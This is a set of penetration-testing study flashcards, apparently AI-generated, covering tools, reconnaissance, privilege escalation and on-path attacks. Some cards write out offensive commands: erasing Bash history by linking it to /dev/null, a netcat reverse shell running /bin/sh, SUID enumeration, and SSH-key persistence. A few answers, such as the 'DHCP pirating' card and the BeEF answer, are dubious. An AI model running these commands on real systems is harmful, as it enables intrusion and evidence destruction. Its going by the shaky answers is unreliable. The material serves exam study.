ChatGPT made up some questions Flashcards

1
Q

Annie wants to permanently remove evidence of commands she entered in a Bash shell on a compromised Linux system. Which command should she use?

  • history -c
  • kill -9 $$
  • echo "" > ~/.bash_history
  • ln /dev/null ~/.bash_history -sf
A

ln /dev/null ~/.bash_history -sf

While history -c clears the current session’s history, the Bash history file will still persist on disk. The correct answer is D, ln /dev/null ~/.bash_history -sf, which creates a symbolic link to /dev/null for the history file. This effectively prevents any future commands from being written to ~/.bash_history, permanently erasing the history

2
Q

Kaiden is performing an automated web application security scan before deployment. Which tool is best suited for this task?

  • nmap
  • Nikto
  • Wireshark
  • CeWL
A

Nikto

Nikto is a dedicated web application security scanner designed to identify vulnerabilities such as misconfigurations, outdated software, and potential security issues in web servers and applications. Nmap is primarily a network scanner, Wireshark is a packet analysis tool, and CeWL is a tool for creating custom wordlists

3
Q

Steve is gathering information during a penetration test without actively interacting with or probing the target systems. What type of information is he collecting?

  • OSINT
  • HSI
  • Background
  • None of the above
A

OSINT

Open Source Intelligence (OSINT) involves collecting publicly available information about a target without engaging in direct interaction. This includes using sources like websites, social media, and publicly accessible databases. It is a passive reconnaissance technique

4
Q

Brian is investigating his organization’s servers to look for evidence of past breaches. What term best describes this activity?

  • Penetration testing
  • Vulnerability scanning
  • Remediation
  • Threat hunting
A

Threat hunting

Threat hunting involves proactively searching an organization’s infrastructure for signs of past or ongoing breaches. Unlike penetration testing or vulnerability scanning, threat hunting adopts the attacker’s mindset to find evidence of compromises

5
Q

Liam runs the following command on a compromised system:
nc 10.1.10.1 7337 -e /bin/sh

What has Liam done?

  • Started a reverse shell using Netcat
  • Captured traffic on the Ethernet port to the console via Netcat
  • Set up a bind shell using Netcat
  • None of the above
A

Started a reverse shell using Netcat

The correct answer is A. Started a reverse shell using Netcat. In this command, Netcat (nc) connects to the remote IP address (10.1.10.1) on port 7337 and executes the Bash shell (/bin/sh). This creates a reverse shell where the compromised system initiates the connection to the attacker’s system

6
Q

Alaina wants to conduct an on-path attack against a target system. Which technique can she use to make it appear she has the IP address of a trusted server?

  • ARP spoofing
  • IP proofing
  • DHCP pirating
  • Spoofmastering
A

ARP spoofing

ARP spoofing involves sending forged ARP responses to associate the attacker’s MAC address with the IP address of a trusted server. This allows the attacker to intercept traffic intended for the legitimate server, enabling an on-path attack

Spoofmastering and IP proofing are made up

7
Q

DHCP pirating

A

DHCP pirating involves an attacker compromising or impersonating a DHCP server to distribute rogue IP configurations to clients on a network. This can be used to redirect traffic, enable man-in-the-middle attacks, or disrupt network connectivity

8
Q

Michael’s social engineering attack relies on telling staff members that others have already provided the information he is requesting. What motivation technique is he using?

  • Authority
  • Scarcity
  • Likeness
  • Social proof
A

Social proof

Explanation:
The correct answer is D. Social proof. Social proof relies on convincing the target that others have already taken a specific action or provided the requested information, leveraging the target’s trust in collective behavior. Likeness relies on building rapport and finding commonalities with the target

9
Q

Vincent wants access to workstations at his target organization but cannot gain entry to the building or remote access. What technique can he use to attempt physical compromise?

  • Shoulder surfing
  • Kerberoasting
  • USB key drop
  • Quid pro quo
A

USB key drop

A USB key drop involves leaving malicious USB drives in accessible locations to tempt employees into plugging them into their workstations. This technique relies on human curiosity and can install malware or provide the attacker with access

10
Q

Jennifer discovers the following file attributes on a Linux system:
-rwsr-xr-- 1 root kismet 653905 Nov 4 2016 /usr/bin/kismet_capture

What type of file has she found?

  • An encrypted file
  • A hashed file
  • A SUID file
  • A SIP file
A

A SUID file

Explanation:
The “s” in the file permissions indicates that this is a SUID (Set User ID) file. When executed, it runs with the permissions of its owner (in this case, root) rather than the user who runs it. This can be a security risk if improperly managed

11
Q

SUID file

A
  • A SUID file in Linux is indicated by an “s” in the owner execute position of the file permissions (e.g., -rwsr-xr--)
  • This means that when the file is executed, it runs with the permissions of the file owner (typically root) rather than the user executing the file
  • SUID is a legitimate feature but can be a security risk if improperly configured, as it can be exploited to elevate privileges.
12
Q

SIP file

A
  • SIP (System Integrity Protection) is a macOS-specific security feature and does not apply directly to Linux files.
  • SIP is designed to protect system files, directories, and processes from being modified, even by users with root privileges.
13
Q

Chris suspects a Linux system he has compromised is a virtual machine. Which of the following techniques will NOT help confirm virtualization?

  • Run systemd-detect-virt.
  • Run ls -l /dev/disk/by-id.
  • Run wmic baseboard get manufacturer, product.
  • Run dmidecode to retrieve hardware information.
A

Run wmic baseboard get manufacturer, product.

The correct answer is C. Run wmic baseboard get manufacturer, product. This command is specific to Windows and cannot be used on a Linux system to check for virtualization. The other options are valid methods for identifying virtualization on Linux

14
Q

Which of the following tools is best suited for performing passive reconnaissance using open-source intelligence (OSINT)?

  • Nmap
  • Shodan
  • Metasploit
  • Nikto
A

Shodan

Shodan is a search engine specifically designed to identify devices connected to the internet and provide OSINT for passive reconnaissance. It allows penetration testers to gather information without directly interacting with the target. Tools like Nmap, Metasploit, and Nikto involve active interaction and scanning of the target systems.

15
Q

What type of privilege escalation involves exploiting software bugs to gain higher permissions on a system?

  • Vertical privilege escalation
  • Horizontal privilege escalation
  • Exploit chaining
  • Social engineering
A

Vertical privilege escalation

Vertical privilege escalation occurs when an attacker exploits software bugs or vulnerabilities to gain higher permissions, such as moving from a standard user account to an administrative account. Horizontal privilege escalation, in contrast, involves accessing another user’s data or privileges at the same level

16
Q

What is the main purpose of setting up a SOCKS proxy during a penetration test?

  • To intercept and modify web traffic
  • To anonymize the penetration tester’s traffic
  • To route traffic through a compromised system for lateral movement
  • To exfiltrate data from a target network
A

To route traffic through a compromised system for lateral movement

A SOCKS proxy is commonly used during penetration testing to route traffic through a compromised system. This allows the penetration tester to perform lateral movement within the target network while maintaining control over traffic flow. Intercepting or modifying web traffic would typically involve tools like Burp Suite, not SOCKS proxies.

17
Q

Which type of vulnerability occurs when an application includes unvalidated user input in a web request without proper encoding or validation?

  • Cross-Site Scripting (XSS)
  • SQL Injection
  • File Inclusion
  • Command Injection
A

Cross-Site Scripting (XSS)

Cross-Site Scripting (XSS) vulnerabilities occur when an application fails to properly validate or encode user input, allowing malicious scripts to be executed in the browser of another user. This can result in data theft, session hijacking, or unauthorized actions on behalf of the victim. SQL injection, file inclusion, and command injection target different components of a system

18
Q

Which of the following tools would a penetration tester use to test for directory traversal vulnerabilities in a web application?

  • Burp Suite
  • Metasploit
  • Nikto
  • Hydra
A

Nikto

Nikto is a web server scanner designed to identify vulnerabilities, including directory traversal, outdated software, and insecure configurations. While Burp Suite can also test for web vulnerabilities, it requires manual configuration for such tests. Metasploit focuses on exploits, and Hydra is used for password attacks

19
Q

What technique can attackers use to spoof their IP address during an on-path attack?

  • MAC flooding
  • IP spoofing
  • VLAN hopping
  • DNS cache poisoning
A

IP spoofing

Explanation:
IP spoofing involves forging the source IP address in packets to make them appear as if they originate from a trusted source. This technique is commonly used during on-path attacks to intercept or redirect traffic. DNS cache poisoning manipulates DNS responses, but it doesn’t spoof IP addresses directly

20
Q

IP spoofing

A
  • A technique used in cybersecurity to forge the source IP address of a packet, making it appear as though the packet originates from a trusted source
  • Attackers use IP spoofing to bypass security measures, hide their identity, or conduct specific types of attacks such as on-path attacks or denial-of-service (DoS)
21
Q

What does the chmod 4755 command do when applied to a Linux executable file?

  • Makes the file writable by all users
  • Sets the SUID bit, allowing execution with the owner’s privileges
  • Hides the file from directory listings
  • Denies execution for non-root users
A

Sets the SUID bit, allowing execution with the owner’s privileges

The chmod 4755 command sets the SUID (Set User ID) bit on an executable file, enabling it to execute with the permissions of the file’s owner rather than the user running it. This is often used for system binaries but can be a security risk if misused.

22
Q

Which of the following best describes the purpose of a honeypot in penetration testing?

  • To identify vulnerabilities in internal systems
  • To attract and monitor attackers’ activities
  • To prevent unauthorized access to critical systems
  • To provide redundancy for high-availability services
A

To attract and monitor attackers’ activities

A honeypot is a decoy system designed to lure attackers and monitor their behavior, providing valuable insights into their tactics, techniques, and procedures. It is not intended for system protection or redundancy but rather as a tool for detection and research.

23
Q

Which scripting language is commonly used to automate penetration testing tasks and create custom scripts for exploits?

  • PowerShell
  • Ruby
  • Python
  • Perl
A

Python

Python is one of the most widely used scripting languages for automating penetration testing tasks and developing custom exploits due to its versatility, extensive libraries, and ease of use. While PowerShell is used in Windows environments, and Ruby and Perl are also scripting options, Python is the most common choice for penetration testing

24
Q

SOCKS proxy

A
  • a transport layer proxy that routes traffic through an intermediary, supporting protocols like TCP and UDP
  • commonly used in penetration testing for lateral movement, allowing traffic to pivot through a compromised host and access internal networks
  • anonymize traffic by masking the original source
25
Q

DNS poisoning

A
  • also known as DNS cache poisoning or DNS spoofing
  • an attack that corrupts the DNS resolution process
  • manipulates the DNS cache of a resolver or a user’s machine to redirect traffic from legitimate websites to malicious ones without the user’s knowledge
26
Q

chmod 4755

A

Turns the file into a SUID file: when the file is executed, it runs with the privileges of the file owner, regardless of the user’s privileges. Commonly used for system utilities that require elevated privileges (e.g., /usr/bin/passwd).

  • The first digit, 4 (SetUID bit): sets the SUID (Set User ID) bit on the file.
  • The remaining digits, 755 (standard file permissions), represent the owner, group, and others permissions:
    7 (Owner): Read (r), write (w), and execute (x) permissions.
    5 (Group): Read (r) and execute (x) permissions.
    5 (Others): Read (r) and execute (x) permissions.
27
Q

You are conducting a penetration test and need to identify which systems on a target network are vulnerable to remote code execution exploits. Which of the following tools is most suited for this task, and why?

  • Nikto
  • Nmap
  • Wireshark
  • Burp Suite
A

Nmap

Nmap is a versatile network scanner that can perform detailed reconnaissance of systems on a network. With the use of scripts (such as the Nmap Scripting Engine or NSE), it can check for specific vulnerabilities, including those that allow remote code execution. Nikto (option A) is primarily a web server scanner and is not used for general network vulnerability scanning

28
Q

During a penetration test, you gain access to a Linux system and want to maintain persistence. Which of the following methods is most likely to provide persistence without requiring high privileges?

  • Creating a cron job to execute your payload
  • Adding your payload to the system’s startup scripts
  • Modifying the SSH authorized_keys file
  • Installing a rootkit
A

Modifying the SSH authorized_keys file

Modifying the ~/.ssh/authorized_keys file allows you to add your public SSH key to the target user’s SSH configuration. This method provides persistence without requiring elevated (root) privileges, as it only requires write access to the target user’s home directory. While creating a cron job (Option A) or modifying startup scripts (Option B) are valid persistence techniques, they typically require higher privileges. Installing a rootkit (Option D) is also persistent but involves significant risks and high privilege requirements

29
Q

A penetration tester needs to enumerate subdomains for a target organization as part of the reconnaissance phase. Which tool is most appropriate for this task?

  • theHarvester
  • Nessus
  • Nikto
  • Wireshark
A

theHarvester

theHarvester is specifically designed for gathering open-source intelligence (OSINT) such as subdomains, email addresses, and other related information from public sources. It is highly effective during the reconnaissance phase of a penetration test. Nessus (Option B) and Nikto (Option C) are used for vulnerability scanning, and Wireshark (Option D) captures and analyzes network traffic, making them unsuitable for this task

30
Q

You want to test whether a target system is vulnerable to a Man-in-the-Middle (MitM) attack by spoofing ARP messages. Which tool would you choose?

  • Responder
  • Aircrack-ng
  • Ettercap
  • Hydra
A

Ettercap

Ettercap is a tool designed specifically for carrying out Man-in-the-Middle (MitM) attacks, including ARP spoofing, allowing penetration testers to intercept, manipulate, or observe network traffic. Responder (Option A) is used for capturing credentials in network poisoning attacks but does not perform ARP spoofing. Aircrack-ng (Option B) focuses on wireless network attacks, and Hydra (Option D) is used for brute-forcing credentials

31
Q

Ettercap

A
  • A comprehensive suite of tools for performing on-path (Man-in-the-Middle) attacks on a variety of systems and protocols.
  • Allows penetration testers to intercept, monitor, and manipulate live network traffic.
  • Open-source and supports plugins to extend its capabilities.
32
Q

During a penetration test, you want to enumerate all user accounts on a Windows system using SMB. Which tool or technique would be best suited for this task?

  • BloodHound
  • PsExec
  • Enum4linux
  • CrackMapExec
A

Enum4linux

Enum4linux is a tool specifically designed for enumerating information from Windows systems using SMB, including user accounts, shared resources, and group memberships. BloodHound (Option A) is used for Active Directory enumeration and attack path analysis, PsExec (Option B) is for executing commands on remote systems, and CrackMapExec (Option D) is a broader post-exploitation tool that focuses on lateral movement and credential testing

33
Q

Enum4linux

A
  • A Linux-based tool for enumerating information from Windows systems via SMB, including user accounts, shares, and other sensitive details.
  • It is widely used during reconnaissance to gather critical data about a target environment.
  • Supports additional enumeration tasks like identifying group memberships and operating system details.
34
Q

You need to test a target network for vulnerabilities associated with the SMB protocol. Which tool would allow you to scan for and exploit SMB vulnerabilities efficiently?

  • Metasploit
  • Nikto
  • Nessus
  • Burp Suite
A

Metasploit

Metasploit is a powerful framework for vulnerability assessment and exploitation, making it ideal for identifying and exploiting SMB vulnerabilities. It includes specific modules, such as those for EternalBlue and SMB enumeration. Nessus (Option C) is a vulnerability scanner and can identify SMB vulnerabilities but does not exploit them. Nikto (Option B) is for web server scanning, and Burp Suite (Option D) focuses on web application vulnerabilities

35
Q

You are writing a script to automate the process of extracting IP addresses from log files. Which scripting language would be the most efficient and commonly used for this task in penetration testing?

  • Python
  • Bash
  • Ruby
  • PowerShell
A

Python

Python is highly efficient and widely used in penetration testing due to its simplicity and extensive libraries for handling tasks like string manipulation, regex operations, and file processing. While Bash (Option B) is useful for shell scripting, Python is more powerful for processing structured data. Ruby (Option C) is less commonly used for this purpose, and PowerShell (Option D) is primarily tailored for Windows environments

36
Q

During a penetration test, you identify an open port running a MySQL service. Which tool would you use to test for vulnerabilities in the database?

  • Burp Suite
  • SQLmap
  • Nikto
  • Nessus
A

SQLmap

SQLmap is a tool designed for testing SQL injection vulnerabilities, making it ideal for testing MySQL and other databases for exploitable flaws. Burp Suite (Option A) is used for web application testing, Nikto (Option C) scans web servers for common vulnerabilities, and Nessus (Option D) is a general-purpose vulnerability scanner but not specifically focused on SQL injection

37
Q

Which tool would you use to craft custom packets for testing firewalls and IDS/IPS systems?

  • Nmap
  • Hping
  • Nessus
  • Hydra
A

Hping

Hping is a command-line tool used to craft and send custom packets, making it ideal for testing firewalls and intrusion detection/prevention systems (IDS/IPS). It provides flexibility in creating packets with specific headers, payloads, and flags. Nmap (Option A) is primarily a network scanning tool, Nessus (Option C) is for vulnerability assessment, and Hydra (Option D) is for brute-forcing credentials

38
Q

During a penetration test, you gain a limited shell on a Linux target. Which command will you use to attempt privilege escalation by checking for misconfigured SUID binaries?

  • ls -al /usr/bin/
  • sudo -l
  • find / -perm -4000 -type f 2>/dev/null
  • ps aux | grep root
A

find / -perm -4000 -type f 2>/dev/null

The command find / -perm -4000 -type f 2>/dev/null searches for files with the SUID bit set (-perm -4000) across the entire file system (/). SUID binaries can allow privilege escalation if they are misconfigured. While ls -al /usr/bin/ (Option A) lists files in a directory, it doesn’t find all SUID files. sudo -l (Option B) checks a user’s permissions with sudo but isn’t for finding SUID binaries. ps aux | grep root (Option D) lists processes run by the root user but doesn’t help with privilege escalation directly

39
Q

You need to test for insecure APIs in a web application. Which tool would be most effective?

  • OWASP ZAP
  • Nikto
  • Aircrack-ng
  • John the Ripper
A

OWASP ZAP

OWASP ZAP is a robust web application testing tool that includes features for API testing, such as intercepting and analyzing API requests and responses for vulnerabilities. Nikto (Option B) focuses on web server vulnerabilities, Aircrack-ng (Option C) is for wireless network testing, and John the Ripper (Option D) is for password cracking

40
Q

You suspect that an attacker has tampered with a critical log file on a compromised system. Which method would you use to verify the integrity of the log file?

  • Compare the log file against a known good backup.
  • Open the log file and inspect its contents manually.
  • Search for known attack patterns in the log file.
  • Run the ls command to check the file’s size and modification date.
A

Compare the log file against a known good backup

The most reliable way to verify the integrity of a log file is to compare it against a trusted, unaltered backup copy. This ensures that you detect even subtle modifications. Inspecting the file manually (Option B) may not reveal hidden changes, searching for attack patterns (Option C) might miss tampering unrelated to those patterns, and checking the file’s size and modification date with ls (Option D) provides limited information and can be easily manipulated by attackers

41
Q

During a penetration test, you discover that a target web application stores sensitive data in a session token without encryption. Which vulnerability best describes this issue?

  • Insecure Direct Object Reference (IDOR)
  • Session Fixation
  • Information Disclosure
  • Broken Authentication
A

Information Disclosure

Storing sensitive data in session tokens without encryption is an example of Information Disclosure. This vulnerability occurs when sensitive information is exposed in an unsafe manner, such as being stored in cleartext. Insecure Direct Object Reference (Option A) pertains to unauthorized access to objects, Session Fixation (Option B) relates to session management flaws, and Broken Authentication (Option D) involves failures in enforcing authentication mechanisms.

42
Q

Which tool would you use to analyze Windows memory dumps for signs of malware or other malicious activity?

  • Volatility
  • Wireshark
  • Metasploit
  • BloodHound
A

Volatility

Volatility is a powerful tool for memory forensics and is specifically designed to analyze memory dumps from Windows and other operating systems. It can identify malware, processes, and other malicious activities in memory. Wireshark (Option B) analyzes network traffic, Metasploit (Option C) is an exploitation framework, and BloodHound (Option D) is used for Active Directory attack path mapping

43
Q

Volatility

A
  • Purpose: A memory forensics framework used to analyze memory dumps from compromised systems.
  • Capabilities: Identifies malware, suspicious processes, and other malicious activity in system memory.
  • Use Case: Detecting malicious code and activities post-exploitation on Windows, Linux, and macOS.
44
Q

You want to identify whether a Linux system is running inside a virtualized environment. Which command would provide this information?

  • dmesg | grep virtual
  • lsmod | grep vm
  • ifconfig | grep eth0
  • ps aux | grep vmware
A

dmesg | grep virtual

The dmesg command displays messages from the system’s kernel, and using grep virtual filters for virtualization-related information. This method is a reliable way to determine whether a system is running in a virtualized environment. While lsmod | grep vm (Option B) may show virtualization modules, it’s not always comprehensive. Options C and D do not directly identify virtualization

45
Q

A penetration tester is using a tool to simulate multiple types of web application attacks, including XSS and CSRF. Which tool is being used?

  • BeEF
  • OWASP ZAP
  • Nikto
  • Burp Suite
A

BeEF

BeEF (Browser Exploitation Framework) specializes in exploiting browser vulnerabilities, including Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF). While Burp Suite (Option D) is a comprehensive web application testing tool, BeEF is specifically focused on browser-based attack scenarios. OWASP ZAP (Option B) is for general web application vulnerability testing, and Nikto (Option C) focuses on web server vulnerabilities

46
Q

You need to evade detection while performing a network scan on a target system. Which of the following techniques is the most effective?

  • Fragmenting packets
  • Using the -T4 timing option in Nmap
  • Sending scans from a single IP address
  • Scanning all ports simultaneously
A

Fragmenting packets

Fragmenting packets is an effective technique for evading detection because it splits the scan traffic into smaller packets, making it harder for intrusion detection systems (IDS) to recognize and block the activity. Using the -T4 timing option (Option B) increases scanning speed but is more likely to trigger detection. Sending scans from a single IP address (Option C) and scanning all ports simultaneously (Option D) are also more conspicuous and likely to be detected